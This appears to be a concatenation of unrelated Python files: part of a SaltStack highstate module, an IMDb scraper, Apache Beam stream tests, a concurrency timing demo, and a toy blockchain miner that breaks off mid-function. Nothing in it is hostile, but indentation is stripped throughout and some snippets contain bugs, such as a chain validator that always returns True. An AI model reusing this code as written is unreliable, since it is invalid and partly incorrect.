# quite certainly a syntax error, managed elsewhere
continue
state[name][s_dec].append({"order": self.iorder})
self.iorder += 1
return state
def _handle_state_decls(self, state, sls, saltenv, errors):
"""
Add sls and saltenv components to the state
"""
for name in state:
if not isinstance(state[name], dict):
if name == "__extend__":
continue
if name == "__exclude__":
continue
if isinstance(state[name], str):
# Is this is a short state, it needs to be padded
if "." in state[name]:
comps = state[name].split(".")
state[name] = {
"__sls__": sls,
"__env__": saltenv,
comps[0]: [comps[1]],
}
continue
errors.append("ID {} in SLS {} is not a dictionary".format(name, sls))
continue
skeys = set()
for key in list(state[name]):
if key.startswith("_"):
continue
if not isinstance(state[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - source: salt://redis/redis.conf
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in SLS '{}' contains multiple state "
"declarations of the same type".format(name, sls)
)
continue
state[name][comps[0]] = state[name].pop(key)
state[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
if "__sls__" not in state[name]:
state[name]["__sls__"] = sls
if "__env__" not in state[name]:
state[name]["__env__"] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
"""
Take the extend dec out of state and apply to the highstate global
dec
"""
if "extend" in state:
ext = state.pop("extend")
if not isinstance(ext, dict):
errors.append(
("Extension value in SLS '{}' is not a " "dictionary").format(sls)
)
return
for name in ext:
if not isinstance(ext[name], dict):
errors.append(
"Extension name '{}' in SLS '{}' is "
"not a dictionary".format(name, sls)
)
continue
if "__sls__" not in ext[name]:
ext[name]["__sls__"] = sls
if "__env__" not in ext[name]:
ext[name]["__env__"] = saltenv
for key in list(ext[name]):
if key.startswith("_"):
continue
if not isinstance(ext[name][key], list):
continue
if "." in key:
comps = key.split(".")
ext[name][comps[0]] = ext[name].pop(key)
ext[name][comps[0]].append(comps[1])
state.setdefault("__extend__", []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
"""
Take the exclude dec out of the state and apply it to the highstate
global dec
"""
if "exclude" in state:
exc = state.pop("exclude")
if not isinstance(exc, list):
err = "Exclude Declaration in SLS {} is not formed " "as a list".format(
sls
)
errors.append(err)
state.setdefault("__exclude__", []).extend(exc)
def render_highstate(self, matches, context=None):
"""
Gather the state files and render them into a single unified salt
high data structure.
"""
highstate = self.building_highstate
all_errors = []
mods = set()
statefiles = []
for saltenv, states in matches.items():
for sls_match in states:
if saltenv in self.avail:
statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
elif "__env__" in self.avail:
statefiles = fnmatch.filter(self.avail["__env__"], sls_match)
else:
all_errors.append(
"No matching salt environment for environment "
"'{}' found".format(saltenv)
)
# if we did not found any sls in the fileserver listing, this
# may be because the sls was generated or added later, we can
# try to directly execute it, and if it fails, anyway it will
# return the former error
if not statefiles:
statefiles = [sls_match]
for sls in statefiles:
r_env = "{}:{}".format(saltenv, sls)
if r_env in mods:
continue
state, errors = self.render_state(
sls, saltenv, mods, matches, context=context
)
if state:
self.merge_included_states(highstate, state, errors)
for i, error in enumerate(errors[:]):
if "is not available" in error:
# match SLS foobar in environment
this_sls = "SLS {} in saltenv".format(sls_match)
if this_sls in error:
errors[i] = (
"No matching sls found for '{}' "
"in env '{}'".format(sls_match, saltenv)
)
all_errors.extend(errors)
self.clean_duplicate_extends(highstate)
return highstate, all_errors
def clean_duplicate_extends(self, highstate):
if "__extend__" in highstate:
highext = []
for items in (ext.items() for ext in highstate["__extend__"]):
for item in items:
if item not in highext:
highext.append(item)
highstate["__extend__"] = [{t[0]: t[1]} for t in highext]
def merge_included_states(self, highstate, state, errors):
# The extend members can not be treated as globally unique:
if "__extend__" in state:
highstate.setdefault("__extend__", []).extend(state.pop("__extend__"))
if "__exclude__" in state:
highstate.setdefault("__exclude__", []).extend(state.pop("__exclude__"))
for id_ in state:
if id_ in highstate:
if highstate[id_] != state[id_]:
errors.append(
(
"Detected conflicting IDs, SLS"
" IDs need to be globally unique.\n The"
" conflicting ID is '{}' and is found in SLS"
" '{}:{}' and SLS '{}:{}'"
).format(
id_,
highstate[id_]["__env__"],
highstate[id_]["__sls__"],
state[id_]["__env__"],
state[id_]["__sls__"],
)
)
try:
highstate.update(state)
except ValueError:
errors.append("Error when rendering state with contents: {}".format(state))
def _check_pillar(self, force=False):
"""
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
"""
if force:
return True
if "_errors" in self.state.opts["pillar"]:
return False
return True
def matches_whitelist(self, matches, whitelist):
"""
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
"""
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(",")
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
def call_highstate(
self,
exclude=None,
cache=None,
cache_name="highstate",
force=False,
whitelist=None,
orchestration_jid=None,
):
"""
Run the sequence to execute the salt highstate for this minion
"""
# Check that top file exists
tag_name = "no_|-states_|-states_|-None"
ret = {
tag_name: {
"result": False,
"comment": "No states found for this minion",
"name": "No States",
"changes": {},
"__run_num__": 0,
}
}
cfn = os.path.join(self.opts["cachedir"], "{}.cache.p".format(cache_name))
if cache:
if os.path.isfile(cfn):
with salt.utils.files.fopen(cfn, "rb") as fp_:
high = self.serial.load(fp_)
return self.state.call_high(high, orchestration_jid)
# File exists so continue
err = []
try:
top = self.get_top()
except SaltRenderError as err:
ret[tag_name]["comment"] = "Unable to render top file: "
ret[tag_name]["comment"] += str(err.error)
return ret
except Exception: # pylint: disable=broad-except
trb = traceback.format_exc()
err.append(trb)
return err
err += self.verify_tops(top)
matches = self.top_matches(top)
if not matches:
msg = (
"No Top file or master_tops data matches found. Please see "
"master log for details."
)
ret[tag_name]["comment"] = msg
return ret
matches = self.matches_whitelist(matches, whitelist)
self.load_dynamic(matches)
if not self._check_pillar(force):
err += ["Pillar failed to render with the following messages:"]
err += self.state.opts["pillar"]["_errors"]
else:
high, errors = self.render_highstate(matches)
if exclude:
if isinstance(exclude, str):
exclude = exclude.split(",")
if "__exclude__" in high:
high["__exclude__"].extend(exclude)
else:
high["__exclude__"] = exclude
err += errors
if err:
return err
if not high:
return ret
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Make sure cache file isn't read-only
self.state.functions["cmd.run"](
["attrib", "-R", cfn],
python_shell=False,
output_loglevel="quiet",
)
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
self.serial.dump(high, fp_)
except TypeError:
# Can't serialize pydsl
pass
except OSError:
log.error('Unable to write to "state.highstate" cache file %s', cfn)
return self.state.call_high(high, orchestration_jid)
def compile_highstate(self):
"""
Return just the highstate or the errors
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
err += errors
if err:
return err
return high
def compile_low_chunks(self):
"""
Compile the highstate but don't run it, return the low chunks to
see exactly what the highstate will execute
"""
top = self.get_top()
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
# If there is extension data reconcile it
high, ext_errors = self.state.reconcile_extend(high)
errors += ext_errors
# Verify that the high data is structurally sound
errors += self.state.verify_high(high)
high, req_in_errors = self.state.requisite_in(high)
errors += req_in_errors
high = self.state.apply_exclude(high)
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.state.compile_high_data(high)
return chunks
def compile_state_usage(self):
"""
Return all used and unused states for the minion based on the top match data
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
if err:
return err
matches = self.top_matches(top)
state_usage = {}
for saltenv, states in self.avail.items():
env_usage = {
"used": [],
"unused": [],
"count_all": 0,
"count_used": 0,
"count_unused": 0,
}
env_matches = matches.get(saltenv)
for state in states:
env_usage["count_all"] += 1
if state in env_matches:
env_usage["count_used"] += 1
env_usage["used"].append(state)
else:
env_usage["count_unused"] += 1
env_usage["unused"].append(state)
state_usage[saltenv] = env_usage
return state_usage
class HighState(BaseHighState):
"""
Generate and execute the salt "High State". The High State is the
compound state derived from a group of template files stored on the
salt master or in the local cache.
"""
# a stack of active HighState objects during a state.highstate run
stack = []
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.opts = opts
self.client = salt.fileclient.get_file_client(self.opts)
BaseHighState.__init__(self, opts)
self.state = State(
self.opts,
pillar_override,
jid,
pillar_enc,
proxy=proxy,
context=context,
mocked=mocked,
loader=loader,
initial_pillar=initial_pillar,
)
self.matchers = salt.loader.matchers(self.opts)
self.proxy = proxy
# tracks all pydsl state declarations globally across sls files
self._pydsl_all_decls = {}
# a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
self._pydsl_render_stack = []
def push_active(self):
self.stack.append(self)
@classmethod
def clear_active(cls):
# Nuclear option
#
# Blow away the entire stack. Used primarily by the test runner but also
# useful in custom wrappers of the HighState class, to reset the stack
# to a fresh state.
cls.stack = []
@classmethod
def pop_active(cls):
cls.stack.pop()
@classmethod
def get_active(cls):
try:
return cls.stack[-1]
except IndexError:
return None
class MasterState(State):
"""
Create a State object for master side compiling
"""
def __init__(self, opts, minion):
State.__init__(self, opts)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
# Load a modified client interface that looks like the interface used
# from the minion, but uses remote execution
#
self.functions = salt.client.FunctionWrapper(self.opts, self.opts["id"])
# Load the states, but they should not be used in this class apart
# from inspection
self.utils = salt.loader.utils(self.opts)
self.serializers = salt.loader.serializers(self.opts)
self.states = salt.loader.states(
self.opts, self.functions, self.utils, self.serializers
)
self.rend = salt.loader.render(
self.opts, self.functions, states=self.states, context=self.state_con
)
class MasterHighState(HighState):
"""
Execute highstate compilation from the master
"""
def __init__(self, master_opts, minion_opts, grains, id_, saltenv=None):
# Force the fileclient to be local
opts = copy.deepcopy(minion_opts)
opts["file_client"] = "local"
opts["file_roots"] = master_opts["master_roots"]
opts["renderer"] = master_opts["renderer"]
opts["state_top"] = master_opts["state_top"]
opts["id"] = id_
opts["grains"] = grains
HighState.__init__(self, opts)
class RemoteHighState:
"""
Manage gathering the data from the master
"""
# XXX: This class doesn't seem to be used anywhere
def __init__(self, opts, grains):
self.opts = opts
self.grains = grains
self.serial = salt.payload.Serial(self.opts)
# self.auth = salt.crypt.SAuth(opts)
self.channel = salt.transport.client.ReqChannel.factory(self.opts["master_uri"])
self._closing = False
def compile_master(self):
"""
Return the state data from the master
"""
load = {"grains": self.grains, "opts": self.opts, "cmd": "_master_state"}
try:
return self.channel.send(load, tries=3, timeout=72000)
except SaltReqTimeoutError:
return {}
def destroy(self):
if self._closing:
return
self._closing = True
self.channel.close()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
|
movie.py
|
import csv
import logging
import threading
import unicodedata
import requests
from bs4 import BeautifulSoup
class Model():
count = 0
def __init__(self):
# 请求头
self.headers = {
'User-Agent': 'Mozilla/5.o (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/65.0.3325.162 Safari/537.36 '
}
# 存放每一步电影的id和imdb的id
self.movie_dct = {}
# 存放已经处理完的movie id
self.white_lst = []
# 电影详情的初始url
self.url = 'https://www.imdb.com/title/'
self.movie_csv_path = 'data/links.csv'
# 电影信息的保存文件
self.info_save_path = 'info.csv'
# logging的配置,记录运行日志
logging.basicConfig(filename="run.log", filemode="a+", format="%(asctime)s %(name)s:%(levelname)s:%(message)s",
datefmt="%Y-%m-%d %H:%M:%S", level=logging.ERROR)
# 表示当前处理的电影
self.cur_movie_id = None
self.cur_imdb_id = None
def get_white_lst(self):
'''获取处理完的白名单'''
with open('white_list') as fb:
for line in fb:
line = line.strip()
self.white_lst.append(line)
def get_movie_id(self):
'''获取电影的id和imdb的id'''
with open(self.movie_csv_path) as fb:
fb.readline()
for line in fb:
line = line.strip()
line = line.split(',')
# 电影id 对应 imdbid
self.movie_dct[line[0]] = line[1]
def update_white_lst(self, movie_id):
'''更新白名单'''
with open('white_list', 'a+') as fb:
fb.write(movie_id + '\n')
def update_black_lst(self, movie_id, msg=''):
with open('black_list.txt', 'a+') as fb:
# 写入movie id 和imdb id,并且加上错误原因
# msg=1是URL失效,msg=2是电影没有海报
fb.write(movie_id + ' ' + self.movie_dct[movie_id] + ' ' + msg + '\n')
def get_url_response(self, url):
'''访问网页请求,返回response'''
logging.info(f'get {url}')
i = 0
# 超时重传,最多5次
while i < 5:
try:
response = requests.get(url, timeout=6, headers=self.headers)
if response.status_code == 200:
logging.info(f'get {url} sucess')
# 正常获取,直接返回
return response
# 如果状态码不对,获取失败,返回None,不再尝试
return None
except requests.RequestException:
# 如果超时
i += 1
logging.error(f'get {url} error')
# 重试5次都失败,返回None
return None
def process_html(self, html):
'''解析html,获取海报,电影信息'''
soup = BeautifulSoup(html, 'lxml')
# 电影名称
name = soup.find('h1').get_text()
# 去掉html的一些/x20等空白符
name = unicodedata.normalize('NFKC', name)
# 电影的基本信息 1h 21min | Animation, Adventure, Comedy | 21 March 1996 (Germany)
info = []
# 年份,G, 电影时长
msg = soup.find_all('li', class_="ipc-inline-list__item")
if msg[0].span is None:
info.append(msg[0].get_text())
else:
info.append(msg[0].span.get_text())
if msg[1].span is None:
info.append(msg[1].get_text())
else:
info.append(msg[1].span.get_text())
if msg[2].span is None:
info.append(msg[2].get_text())
else:
info.append(msg[2].span.get_text())
# 基本信息和详细发布时间 Animation, Adventure, Comedy | 21 March 1996 (Germany)
for tag in soup.find_all(class_="ipc-chip__text"):
info.append(tag.get_text().strip())
info.pop(len(info) - 1)
# 简介
intro = soup.find(class_='GenresAndPlot__TextContainerBreakpointXS_TO_M-cum89p-0 dcFkRD').get_text().strip()
intro = unicodedata.normalize('NFKC', intro)
# 卡司。D W S C,分别表示 导演,编剧,明星,导演
case_dict = {'D': [], 'W': [], 'S': []}
msg = soup.find_all(class_="ipc-metadata-list-item__content-container")
case_dict['D'].append(msg[0].get_text())
for li in msg[1].ul:
case_dict['W'].append(li.get_text())
for writer in soup.find_all(class_="StyledComponents__ActorName-y9ygcu-1 eyqFnv"):
case_dict['S'].append(writer.get_text())
# id,电影名称,海报链接,时长,类型,发行时间,简介,导演,编剧,演员
print(self.cur_movie_id)
detail = [self.cur_movie_id, name, info[0], '|'.join(info[1:-1]),
info[-1], intro,
'|'.join(case_dict['D']), '|'.join(case_dict['W']), '|'.join(case_dict['S'])]
self.save_info(detail)
def save_info(self, detail):
# 存储到CSV文件中
with open(f'{self.info_save_path}', 'a+', encoding='utf-8', newline='') as fb:
writer = csv.writer(fb)
writer.writerow(detail)
def run(self, num):
# 开始爬取信息
# 先读入文件
self.get_white_lst()
self.get_movie_id()
movies = list(enumerate(self.movie_dct.items()))
step = 9
begin = num
for i in range(begin, len(movies), step):
if movies[i][1][0] in self.white_lst:
continue
self.cur_movie_id = movies[i][1][0]
self.cur_imdb_id = movies[i][1][1]
response = self.get_url_response(self.url + 'tt' + self.cur_imdb_id)
if response is None:
self.save_info([self.cur_movie_id, '' * 9])
# 仍然更新白名单,避免重复爬取这些失败的电影
self.update_white_lst(self.cur_movie_id)
# 更新黑名单,爬完之后用另一个脚本再处理
self.update_black_lst(self.cur_movie_id, '1')
continue
# 处理电影详情信息
try:
self.process_html(response.content)
except TypeError as e:
logging.info(f'get {self.cur_movie_id} sucess')
# 处理完成,增加movie id到白名单中
self.update_white_lst(self.cur_movie_id)
logging.info(f'process movie {self.cur_movie_id} success')
if __name__ == '__main__':
s = Model()
s1 = Model()
s2 = Model()
s3 = Model()
s4 = Model()
s5 = Model()
s6 = Model()
s7 = Model()
s8 = Model()
threading.Thread(target=s.run, name=None, args=([0])).start()
threading.Thread(target=s1.run, name=None, args=([1])).start()
threading.Thread(target=s2.run, name=None, args=([2])).start()
threading.Thread(target=s3.run, name=None, args=([3])).start()
threading.Thread(target=s4.run, name=None, args=([4])).start()
threading.Thread(target=s5.run, name=None, args=([5])).start()
threading.Thread(target=s6.run, name=None, args=([6])).start()
threading.Thread(target=s7.run, name=None, args=([7])).start()
threading.Thread(target=s8.run, name=None, args=([8])).start()
|
filesystemio_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for filesystemio."""
# pytype: skip-file
from __future__ import absolute_import
import io
import logging
import multiprocessing
import os
import threading
import unittest
from builtins import range
from apache_beam.io import filesystemio
_LOGGER = logging.getLogger(__name__)
class FakeDownloader(filesystemio.Downloader):
def __init__(self, data):
self._data = data
self.last_read_size = -1
@property
def size(self):
return len(self._data)
def get_range(self, start, end):
self.last_read_size = end - start
return self._data[start:end]
class FakeUploader(filesystemio.Uploader):
def __init__(self):
self.data = b''
self.last_write_size = -1
self.finished = False
def last_error(self):
return None
def put(self, data):
assert not self.finished
self.data += data.tobytes()
self.last_write_size = len(data)
def finish(self):
self.finished = True
class TestDownloaderStream(unittest.TestCase):
def test_file_attributes(self):
downloader = FakeDownloader(data=None)
stream = filesystemio.DownloaderStream(downloader)
self.assertEqual(stream.mode, 'rb')
self.assertTrue(stream.readable())
self.assertFalse(stream.writable())
self.assertTrue(stream.seekable())
def test_read_empty(self):
downloader = FakeDownloader(data=b'')
stream = filesystemio.DownloaderStream(downloader)
self.assertEqual(stream.read(), b'')
def test_read(self):
data = b'abcde'
downloader = FakeDownloader(data)
stream = filesystemio.DownloaderStream(downloader)
# Read size is exactly what was passed to read() (unbuffered).
self.assertEqual(stream.read(1), data[0:1])
self.assertEqual(downloader.last_read_size, 1)
self.assertEqual(stream.read(), data[1:])
self.assertEqual(downloader.last_read_size, len(data) - 1)
def test_read_buffered(self):
data = b'abcde'
downloader = FakeDownloader(data)
buffer_size = 2
stream = io.BufferedReader(
filesystemio.DownloaderStream(downloader), buffer_size)
# Verify that buffering works and is reading ahead.
self.assertEqual(stream.read(1), data[0:1])
self.assertEqual(downloader.last_read_size, buffer_size)
self.assertEqual(stream.read(), data[1:])
class TestUploaderStream(unittest.TestCase):
def test_file_attributes(self):
uploader = FakeUploader()
stream = filesystemio.UploaderStream(uploader)
self.assertEqual(stream.mode, 'wb')
self.assertFalse(stream.readable())
self.assertTrue(stream.writable())
self.assertFalse(stream.seekable())
def test_write_empty(self):
uploader = FakeUploader()
stream = filesystemio.UploaderStream(uploader)
data = b''
stream.write(memoryview(data))
self.assertEqual(uploader.data, data)
def test_write(self):
data = b'abcde'
uploader = FakeUploader()
stream = filesystemio.UploaderStream(uploader)
# Unbuffered writes.
stream.write(memoryview(data[0:1]))
self.assertEqual(uploader.data[0], data[0])
self.assertEqual(uploader.last_write_size, 1)
stream.write(memoryview(data[1:]))
self.assertEqual(uploader.data, data)
self.assertEqual(uploader.last_write_size, len(data) - 1)
def test_write_buffered(self):
data = b'abcde'
uploader = FakeUploader()
buffer_size = 2
stream = io.BufferedWriter(
filesystemio.UploaderStream(uploader), buffer_size)
# Verify that buffering works: doesn't write to uploader until buffer is
# filled.
stream.write(data[0:1])
self.assertEqual(-1, uploader.last_write_size)
stream.write(data[1:])
stream.close()
self.assertEqual(data, uploader.data)
class TestPipeStream(unittest.TestCase):
def _read_and_verify(self, stream, expected, buffer_size, success):
data_list = []
bytes_read = 0
seen_last_block = False
while True:
data = stream.read(buffer_size)
self.assertLessEqual(len(data), buffer_size)
if len(data) < buffer_size:
# Test the constraint that the pipe stream returns less than the buffer
# size only when at the end of the stream.
if data:
self.assertFalse(seen_last_block)
seen_last_block = True
if not data:
break
data_list.append(data)
bytes_read += len(data)
self.assertEqual(stream.tell(), bytes_read)
self.assertEqual(b''.join(data_list), expected)
success[0] = True
def _read_and_seek(self, stream, expected, buffer_size, success):
data_list = []
bytes_read = 0
while True:
data = stream.read(buffer_size)
# Test bad seek positions.
with self.assertRaises(NotImplementedError):
stream.seek(bytes_read + 1)
with self.assertRaises(NotImplementedError):
stream.seek(bytes_read - 1)
# Rewind stream and test that it reads back the same data again.
stream.seek(bytes_read)
data2 = stream.read(buffer_size)
self.assertEqual(data, data2)
if not data:
break
data_list.append(data)
bytes_read += len(data)
self.assertEqual(stream.tell(), bytes_read)
self.assertEqual(len(b''.join(data_list)), len(expected))
self.assertEqual(b''.join(data_list), expected)
success[0] = True
def test_pipe_stream(self):
block_sizes = list(4**i for i in range(0, 12))
data_blocks = list(os.urandom(size) for size in block_sizes)
expected = b''.join(data_blocks)
buffer_sizes = [100001, 512 * 1024, 1024 * 1024]
for buffer_size in buffer_sizes:
for target in [self._read_and_verify, self._read_and_seek]:
_LOGGER.info('buffer_size=%s, target=%s' % (buffer_size, target))
parent_conn, child_conn = multiprocessing.Pipe()
stream = filesystemio.PipeStream(child_conn)
success = [False]
child_thread = threading.Thread(
target=target, args=(stream, expected, buffer_size, success))
child_thread.start()
for data in data_blocks:
parent_conn.send_bytes(data)
parent_conn.close()
child_thread.join()
self.assertTrue(success[0], 'error in test thread')
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
demo.py
|
#!/usr/bin/env python3
"""
simple example of coroutine vs. threading vs. processes
timing on old Windows laptop:
python demo.py c => 2.3 sec.
python demo.py t => 2.5 sec.
python demo.py p => 0.9 sec.
We didn't break out worker setup time from computation time.
In real-world situations, coroutines can be faster and less resource-consuming than threads.
There is no one best choice for all task types, we fit the asynchronous architecture to the task.
There are numerous other popular implementations of threading and coroutines beyond the built-in modules used here.
In computation-bound programs like this example, coroutines and threads would generally not be as good a choice
as multiprocessing. However, the heavier resource usage of multiprocessing is not necessarily best for IO-bound tasks
such as waiting for network connections, where coroutines and/or threads are often a better choice.
"""
import threading
import time
import math
import multiprocessing
import asyncio
import sys
from argparse import ArgumentParser
async def coro_worker(i: int, Niter: int, tic: float):
"""coroutine worker"""
for _ in range(Niter):
math.sin(3)
print(f"Coroutine worker {i} done at {time.monotonic() - tic:.2f} sec.")
async def coro(Nworker: int, Niter: int, tic: float):
if sys.version_info >= (3, 7):
tasks = [asyncio.create_task(coro_worker(i, Niter, tic)) for i in range(Nworker)]
else:
tasks = [asyncio.ensure_future(coro_worker(i, Niter, tic)) for i in range(Nworker)]
await asyncio.wait(tasks)
class Thread_worker(threading.Thread):
"""threading worker"""
def __init__(self, i: int, Niter: int):
super(Thread_worker, self).__init__()
self.Niter = Niter
self.i = i
def run(self):
tic = time.monotonic()
for _ in range(self.Niter):
math.sin(3)
print(f"Thread worker {i} done at {time.monotonic() - tic:.2f} sec.")
def mp_worker(i: int, Niter: int, tic: float):
""" multiprocessing worker"""
for _ in range(Niter):
math.sin(3)
print(f"Process worker {i} done at {time.monotonic() - tic:.2f} sec.")
if __name__ == "__main__":
P = ArgumentParser(
description="Demonstrate differences between coroutines, threads and proceses."
)
P.add_argument(
"method", choices=["c", "t", "p"], help="c: coroutine, t: threading, p: multiprocessing"
)
P.add_argument("-Nworker", help="number of workers", type=int, default=4)
P.add_argument(
"-Niter", help="number of loop iterations (arbitrary)", type=int, default=5000000,
)
A = P.parse_args()
ps = []
ts = []
tic = time.monotonic()
for i in range(A.Nworker):
if A.method == "t":
t = Thread_worker(i, A.Niter)
t.start()
ts.append(t)
elif A.method == "p":
p = multiprocessing.Process(target=mp_worker, args=(i, A.Niter, tic))
p.start()
ps.append(p)
if A.method == "c":
asyncio.run(coro(A.Nworker, A.Niter, tic))
elif A.method == "p":
for p in ps:
p.join()
elif A.method == "t":
for t in ts:
t.join()
print(f"Elapsed wallclock time: {time.monotonic() - tic:.2f} sec.")
|
miner.py
|
import time
import hashlib
import json
import requests
import base64
from flask import Flask, request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Returns a new Block object. Each block is "chained" to its previous
by calling its unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
"""Creates the unique hash for the block. It uses sha256."""
sha = hashlib.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
def create_genesis_block():
"""To create each block, it needs the hash of the previous one. First
block has no previous, so it must be created manually (with index zero
and arbitrary previous hash)"""
return Block(0, time.time(), {
"proof-of-work": 9,
"transactions": None},
"0")
# Node's blockchain copy
BLOCKCHAIN = [create_genesis_block()]
""" Stores the transactions that this node has in a list.
If the node you sent the transaction adds a block
it will get accepted, but there is a chance it gets
discarded and your transaction goes back as if it was never
processed"""
NODE_PENDING_TRANSACTIONS = []
def proof_of_work(last_proof, blockchain):
# Creates a variable that we will use to find our next proof of work
incrementer = last_proof + 1
# Keep incrementing the incrementer until it's equal to a number divisible by 7919
# and the proof of work of the previous block in the chain
start_time = time.time()
while not (incrementer % 7919 == 0 and incrementer % last_proof == 0):
incrementer += 1
# Check if any node found the solution every 60 seconds
if int((time.time()-start_time) % 60) == 0:
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain:
# (False: another node got proof first, new blockchain)
return False, new_blockchain
# Once that number is found, we can return it as a proof of our work
return incrementer, blockchain
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
"""Mining is the only way that new coins can be created.
In order to prevent too many coins to be created, the process
is slowed down by a proof of work algorithm.
"""
# Get the last proof of work
last_block = BLOCKCHAIN[-1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
# If we didn't guess the proof, start mining again
if not proof[0]:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# ...we reward the miner by adding a transaction
# First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(url = MINER_NODE_URL + '/txion', params = {'update':MINER_ADDRESS}).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
# Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({
"from": "network",
"to": MINER_ADDRESS,
"amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {
"proof-of-work": proof[0],
"transactions": list(NODE_PENDING_TRANSACTIONS)
}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({
"index": new_block_index,
"timestamp": new_block_timestamp,
"data": new_block_data,
"hash": last_block_hash
}, sort_keys=True) + "\n")
a.send(BLOCKCHAIN)
requests.get(url = MINER_NODE_URL + '/blocks', params = {'update':MINER_ADDRESS})
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(url = node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
"""Validate the submitted chain. If hashes are not correct, return false
block(str): json
"""
return True
@node.route('/blocks', methods=['GET'])
def get_blocks():
# Load current blockchain. Only you should update your blockchain
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
# Converts our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": block.index,
"timestamp": block.timestamp,
"data": block.data,
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json, sort_keys=True)
return chain_to_send
@node.route('/txion', methods=['GET', 'POST'])
def transaction():
"""Each transaction sent to this node gets validated and submitted.
Then it waits to be added to the blockchain. Transactions only move
coins, they don't create it.
"""
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'], new_txion['signature'], new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
